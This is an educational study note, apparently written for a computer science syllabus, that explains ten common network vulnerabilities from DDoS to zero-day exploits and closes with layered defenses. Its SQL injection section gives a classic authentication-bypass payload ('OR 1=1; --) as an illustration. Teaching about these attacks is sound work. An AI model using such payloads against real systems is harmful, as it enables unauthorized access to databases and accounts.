A2.4.2 Describe common network vulnerabilities. (HL only)

Big Idea
Computer networks interconnect systems to share resources and information, but every interface, protocol and service introduces potential weaknesses that attackers can exploit. Common network vulnerabilities arise when adversaries manipulate traffic flows, exploit flaws in software or protocols, or deceive users into divulging credentials. Understanding these vulnerabilities—how they operate and why they succeed—is essential for designing robust defenses. 

---

1. Distributed Denial of Service (DDoS)

Description:
A DDoS attack floods a target (server, network link or application) with a massive volume of spoofed or bot-driven traffic, overwhelming its capacity and causing legitimate requests to be dropped or delayed.
Mechanism:

• Botnets: Compromised hosts under attacker control send synchronized request floods (e.g. HTTP GET, SYN floods).
• Reflection/Amplification: Attackers send small queries with a spoofed source IP (the victim) to open servers (e.g. DNS, NTP), which reply with much larger responses directed at the victim, multiplying traffic volume.
  Impact:
• Resource exhaustion (CPU, memory, bandwidth).
• Service unavailability for legitimate users.

---

2. Insecure Network Protocols

Description:
Protocols lacking encryption or authentication allow eavesdropping, tampering or session hijacking.
Examples:

• Telnet, FTP, HTTP (clear-text): Credentials and payloads can be read or modified in transit.
• SNMPv1/v2: Community strings sent unencrypted.
  Consequences:
• Credential interception.
• Injection of malicious commands or data.

---

3. Malware

Description:
Malicious software—viruses, worms, ransomware, trojans—that infiltrates hosts to disrupt operations, exfiltrate data or provide remote control.
Network-centric Vectors:

• Worm propagation: Self-replicating code scanning network subnets (e.g., via SMB or remote-execution flaws).
• Ransomware dropper downloads: Malicious payloads fetched over HTTP/HTTPS after initial compromise.
  Implications:
• Lateral movement across VLANs.
• Botnet creation for further attacks.

---

4. Man-in-the-Middle (MitM) Attacks

Description:
An attacker interposes between two communicating parties to intercept, modify or relay messages without detection.
Techniques:

• ARP spoofing: Poisoning switch MAC tables to divert LAN traffic through the attacker’s host.
• DNS spoofing: Providing fraudulent DNS responses so clients connect to malicious servers.
• TLS stripping: Downgrading HTTPS to HTTP to capture credentials.
  Risks:
• Credential theft, data manipulation, injection of malicious payloads.

---

5. Phishing Attacks

Description:
Deceptive communications (email, SMS, web) that trick users into revealing credentials or executing malicious links and attachments.
Network Angle:

• Spear-phishing with malicious hyperlinks: Users access fake login pages over HTTPS, yet controlled by attackers.
• Malicious payload delivery: Attachments download malware once opened.
  Outcome:
• Credential compromise, network foothold, insider-level access.

---

6. SQL Injection

Description:
Attackers inject malicious SQL statements into user inputs that are concatenated into database queries, enabling unauthorized data access or manipulation.
Example:

SELECT * FROM users WHERE username = '’ OR 1=1; --’ AND password = '…';

This payload bypasses authentication by forcing the WHERE clause to always evaluate true.
Impact:

• Data leakage, unauthorized modifications, complete database compromise.

---

7. Cross-Site Scripting (XSS)

Description:
Injection of client-side scripts into web pages viewed by other users, enabling cookie theft, session hijacking or content spoofing.
Variants:

• Stored XSS: Malicious script saved on server (e.g., in a comment field) and served to all visitors.
• Reflected XSS: Payload embedded in a URL and reflected in the response.
  Consequences:
• Account takeover, unauthorized actions under the victim’s identity.

---

8. Unpatched Software

Description:
Outdated operating systems, firmware or applications contain known flaws that attackers can exploit using publicly available exploit code.
Example:

• EternalBlue (MS17-010): SMB vulnerability in unpatched Windows machines led to widespread ransomware outbreaks.
  Result:
• Rapid worm propagation, full system compromise.

---

9. Weak Authentication

Description:
Use of easily guessed, reused or default credentials, and absence of multi-factor authentication (MFA), increases the success rate of brute-force or credential-stuffing attacks.
Scenarios:

• Default admin/password on routers.
• Password spraying against corporate VPN portals.
  Effect:
• Unauthorized network access, privilege escalation.

---

10. Zero-Day Exploits

Description:
Attacks leveraging vulnerabilities unknown to the vendor and unmitigated by available patches.
Characteristics:

• High impact (no signature-based defenses exist).
• Stealthy deployment via targeted delivery (e.g., spear-phishing).
  Threat:
• Network perimeter and endpoint defenses offer little protection until signatures or patches are developed.

---

Conclusion
Networks face a broad spectrum of vulnerabilities—from volumetric floods and protocol design weaknesses to sophisticated injection and social-engineering attacks. Effective defense requires layered controls: secure protocols (TLS, SSH), rigorous patch management, strong authentication, intrusion-prevention systems, and user education. By recognizing how each vulnerability operates and interacts with network components, engineers can architect resilient infrastructures that anticipate and mitigate both known and emerging threats.